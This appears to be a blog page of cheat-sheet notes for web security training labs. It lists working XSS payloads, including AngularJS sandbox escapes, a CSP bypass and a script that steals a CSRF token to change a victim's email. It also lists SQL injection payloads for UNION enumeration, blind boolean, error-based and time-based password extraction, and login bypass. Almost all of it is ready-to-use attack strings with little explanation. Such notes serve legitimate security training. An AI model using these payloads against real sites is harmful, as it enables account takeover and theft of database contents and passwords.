Reflected DOM XSS - quotes escaped, backslash not
\"-alert(1)}// Reflected XSS into HTML context with no encoding <script>alert(1)</script> Reflected XSS into HTML context with most tags and attributes blocked <iframe src="https://vulnerable-site.com/?param=%22%3E%3Cbody%20onresize=alert(document.cookie)%3E" onload=this.style.width='100px'> Reflected XSS into HTML context with all tags blocked except custom ones using onfocus <script>location = 'https://vulnerable-site.com/?param=%3Cxss+id%3Dx+onfocus%3Dalert%28document.cookie%29%20tabindex=1%3E#x'; </script> Reflected XSS with event handlers and href attributes blocked https://vulnerable-site.com/?param=%3Csvg%3E%3Ca%3E%3Canimate+attributeName%3Dhref+values%3Djavascript%3Aalert(1)+%2F%3E%3Ctext+x%3D20+y%3D20%3EClick%20here%3C%2Ftext%3E%3C%2Fa%3E Reflected XSS with some SVG markup allowed using onbegin https://vulnerable-site.com/?param=%22%3E%3Csvg%3E%3Canimatetransform%20onbegin=alert(1)%3E Reflected XSS into attribute with angle brackets HTML-encoded "onmouseover="alert(1)Stored XSS into HTML context with nothing encoded<script>alert(1)</script>Stored XSS into anchor href attribute with double quotes HTML-encoded javascript:alert(1) Reflected XSS in canonical link tag using OS access keys https://vulnerable-site.com/?%27accesskey=%27x%27onclick=%27alert(1) Reflected XSS into a JavaScript string with single quote and backslash escaped </script><script>alert(1)</script> Reflected XSS into a JavaScript string with angle brackets HTML encoded '-alert(1)-' Reflected XSS into a JavaScript string with angle brackets and double quotes HTML-encoded and single quotes escaped test'payload test\payload \'-alert(1)// Reflected XSS in a JavaScript URL with some characters blocked https://vulnerable-site.com/post?postId=5&%27},x=x=%3E{throw/**/onerror=alert,1337},toString=x,window%2b%27%27,{x:%27 Stored XSS into onclick event with angle brackets and double quotes HTML-encoded and single quotes and backslash escaped http://foo?'-alert(1)-' Reflected XSS into a template literal with angle brackets, single, double quotes, backslash and backticks Unicode-escaped ${alert(1)} Reflected XSS with AngularJS sandbox escape without strings https://vulnerable-site.com/?search=1&toString().constructor.prototype.charAt%3d[].join;[1]|orderBy:toString().constructor.fromCharCode(120,61,97,108,101,114,116,40,49,41)=1 Reflected XSS with AngularJS sandbox escape and CSP <script> location='https://vulnerable-site.com/?search=%3Cinput%20id=x%20ng-focus=$event.path|orderBy:%27(z=alert)(document.cookie)%27%3E#x'; </script> DOM XSS in document.write sink using source location.search "><svg onload=alert(1)> DOM XSS in document.write sink using source location.search inside a select element param?paramId=1&storeId="></select><img%20src=1%20onerror=alert(1)> DOM XSS in innerHTML sink using source location.search <img src=1 onerror=alert(1)> DOM XSS in jQuery anchor href attribute sink using location.search source javascript:alert(document.cookie) DOM XSS in AngularJS expression with angle brackets and double quotes HTML-encoded {{$on.constructor('alert(1)')()}}Stored DOM XSS <><img src=1 onerror=alert(1)> Exploiting XSS to perform CSRF <script> var req = new XMLHttpRequest(); req.onload = handleResponse; req.open('get','/site-endpoint',true); req.send(); function handleResponse() { var token = this.responseText.match(/name="csrf" value="(\w+)"/)[1]; var changeReq = new XMLHttpRequest(); changeReq.open('post', '/site-endpoint/request', true); changeReq.send('csrf='+token+'&[email protected]') }; </script> Reflected XSS protected by CSP, with CSP bypass https://vulnerable-site.com/?search=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&token=;script-src-elem%20%27unsafe-inline%27
0 Comments
Links
SQL injection UNION attack, determining the number of columns returned by the query '+UNION+SELECT+NULL-- --Keep adding more NULL values, noting unique responses SQL injection UNION attack, finding a column containing text '+UNION+SELECT+NULL --Keep adding more NULL values, noting unique responses (# of columns) '+UNION+SELECT+'abcdef',NULL,NULL-- --Try string value in each NULL, denoting unique responses SQL injection UNION attack, retrieving data from other tables '+UNION+SELECT+NULL --Keep adding more NULL values, noting unique responses (# of columns) '+UNION+SELECT+'abcdef',NULL,NULL-- --Try string value in each NULL, denoting unique responses '+UNION+SELECT+'abc','def'-- --Ex: 2 columns containing text '+UNION+SELECT+col_name1,+col_name2+FROM+table_name-- --Retrieve contents from table SQL injection UNION attack, retrieving multiple values in a single column '+UNION+SELECT+NULL --Keep adding more NULL values, noting unique responses (# of columns) '+UNION+SELECT+'abcdef',NULL,NULL-- --Try string value in each NULL, denoting unique responses --Retrieving contents of table_name, where col_name1 & col_name2 are columns: '+UNION+SELECT+NULL,col_name1||'~'||col_name2+FROM+table_name-- SQL injection attack, querying the database type and version on Oracle '+UNION+SELECT+NULL --Keep adding more NULL values, noting unique responses (# of columns) '+UNION+SELECT+'abcdef',NULL,NULL-- --Try string value in each NULL, denoting unique responses '+UNION+SELECT+'abc','def'+FROM+DUAL-- --Ex: 2 columns w/ text '+UNION+SELECT+BANNER,+NULL+FROM+v$version-- --Display DB version SQL injection attack, querying the database type and version on MySQL and Microsoft '+UNION+SELECT+NULL --Keep adding more NULL values, noting unique responses (# of columns) '+UNION+SELECT+'abcdef',NULL,NULL-- --Try string value in each NULL, denoting unique responses '+UNION+SELECT+'abc','def'# --Ex: 2 columns w/ text '+UNION+SELECT+@@version,+NULL# --Display DB version SQL injection attack, listing the database contents on non-Oracle databases '+UNION+SELECT+NULL --Keep adding more NULL values, noting unique responses (# of columns) '+UNION+SELECT+'abcdef',NULL,NULL-- --Try string value in each NULL, denoting unique responses '+UNION+SELECT+'abc','def'-- --Ex: 2 columns w/ text --Retrieve the list of tables in the database: '+UNION+SELECT+table_name,+NULL+FROM+information_schema.tables-- SQL injection attack, listing the database contents on Oracle '+UNION+SELECT+NULL --Keep adding more NULL values, noting unique responses (# of columns) '+UNION+SELECT+'abcdef',NULL,NULL-- --Try string value in each NULL, denoting unique responses '+UNION+SELECT+'abc','def'+FROM+DUAL-- --Ex: 2 columns w/ text --Retrieve the list of tables in the database: '+UNION+SELECT+table_name,NULL+FROM+all_tables-- --Retrieve the details of the columns in the table: '+UNION+SELECT+column_name,NULL+FROM+all_tab_columns+WHERE+table_name='USERS_ABCDEF'-- --Retrieving particular columns in a table: '+UNION+SELECT+COL_NAME1,+COL_NAME2+FROM+TABLE_NAME-- Blind SQL injection with conditional responses --Tracking cookie e.g. TrackingId=xyz. Testing boolean conditions to observe response. TrackingId=xyz' AND '1'='1 TrackingId=xyz' AND '1'='2 --Test for existence of a particular table - 'table_name' TrackingId=xyz' AND (SELECT 'a' FROM table_name LIMIT 1)=' --Test for existence of a particular user - 'user_name' TrackingId=xyz' AND (SELECT 'a' FROM table_name WHERE col_name='user_name')='a --Determine the # of chars. in password of user_name above. If true, char. length > 1 TrackingId=xyz' AND (SELECT 'a' FROM table_name WHERE col_name='user_name' AND LENGTH(password)>1)='a --Follow-up tests for password length, incrementing 'n' TrackingId=xyz' AND (SELECT 'a' FROM table_name WHERE col_name='user_name' AND LENGTH(password)>n)='a --Extract a single character from the password, and test it against a specific value. Increment 'n' each cycle. TrackingId=xyz' AND (SELECT SUBSTRING(password,n,1) FROM table_name WHERE col_name='user_name')='a Blind SQL injection with conditional errors --Assume tracking cookie, modify its value, check for response TrackingId=xyz' TrackingId=xyz'' --Confirm that the server is interpreting the injection as a SQL query - valid/invalid? TrackingId=xyz'||(SELECT '')||' --Oracle database? TrackingId=xyz'||(SELECT '' FROM dual)||' --Submitting an invalid query while still preserving valid SQL syntax to verify if injection is being processed as --a SQL query by the back-end if error is returned TrackingId=xyz'||(SELECT '' FROM not-a-real-table)||' --Verifying existence of a particular table - 'table_name'. If no error, likely exists. TrackingId=xyz'||(SELECT '' FROM table_name WHERE ROWNUM = 1)||' --Check for error message, triggering errors conditionally on truth of a condition (1=1) or (1=2) TrackingId=xyz'||(SELECT CASE WHEN (1=1) THEN TO_CHAR(1/0) ELSE '' END FROM dual)||' TrackingId=xyz'||(SELECT CASE WHEN (1=2) THEN TO_CHAR(1/0) ELSE '' END FROM dual)||' --Check for existence of particular username - 'user_name'. If error arises, likely exists. TrackingId=xyz'||(SELECT CASE WHEN (1=1) THEN TO_CHAR(1/0) ELSE '' END FROM table_name WHERE col_name='user_name')||' --Determine # of chars in user_name discovered above TrackingId=xyz'||(SELECT CASE WHEN length(password)>1 THEN to_char(1/0) ELSE '' END FROM table_name WHERE col_name='user_name')||' --Testing password lengths, increment length until error disappears TrackingId=xyz'||(SELECT CASE WHEN LENGTH(password)>2 THEN TO_CHAR(1/0) ELSE '' END FROM table_name WHERE col_name='user_name')||' --Increment 'n' to extract a single character from the password, and test it against a specific value TrackingId=xyz'||(SELECT CASE WHEN SUBSTR(password,n,1)='§a§' THEN TO_CHAR(1/0) ELSE '' END FROM table_name WHERE col_name='user_name')||' Blind SQL injection with time delays --Tracking cookie, SQLi TrackingId=x'||pg_sleep(10)-- Blind SQL injection with time delays and information retrieval --App with tracking cookie, testing for time delay TrackingId=x'%3BSELECT+CASE+WHEN+(1=1)+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END-- TrackingId=x'%3BSELECT+CASE+WHEN+(1=2)+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END-- --Testing for particular table and column TrackingId=x'%3BSELECT+CASE+WHEN+(col_name='insert_name')+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+table_name-- --Determining # of chars in col_name (insert_name) TrackingId=x'%3BSELECT+CASE+WHEN+(col_name='insert_name'+AND+length(password)>1)+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+table_name-- --Increment 'n' to test different password lengths. Correct length is determined once there is no time delay. TrackingId=x'%3BSELECT+CASE+WHEN+(col_name='insert_name'+AND+length(password)>n)+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+table_name-- --Testing match for each password char. Start 'n' at 1, increment until password length determined above. TrackingId=x'%3BSELECT+CASE+WHEN+(col_name='insert_name'+AND+substring(password,n,1)='a')+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+table_name-- SQL injection vulnerability in WHERE clause allowing retrieval of hidden data '+OR+1=1-- SQL injection vulnerability allowing login bypass administrator'-- |
AuthorExploring Android and mobile web design, security, and development. Archives
March 2021
Categories |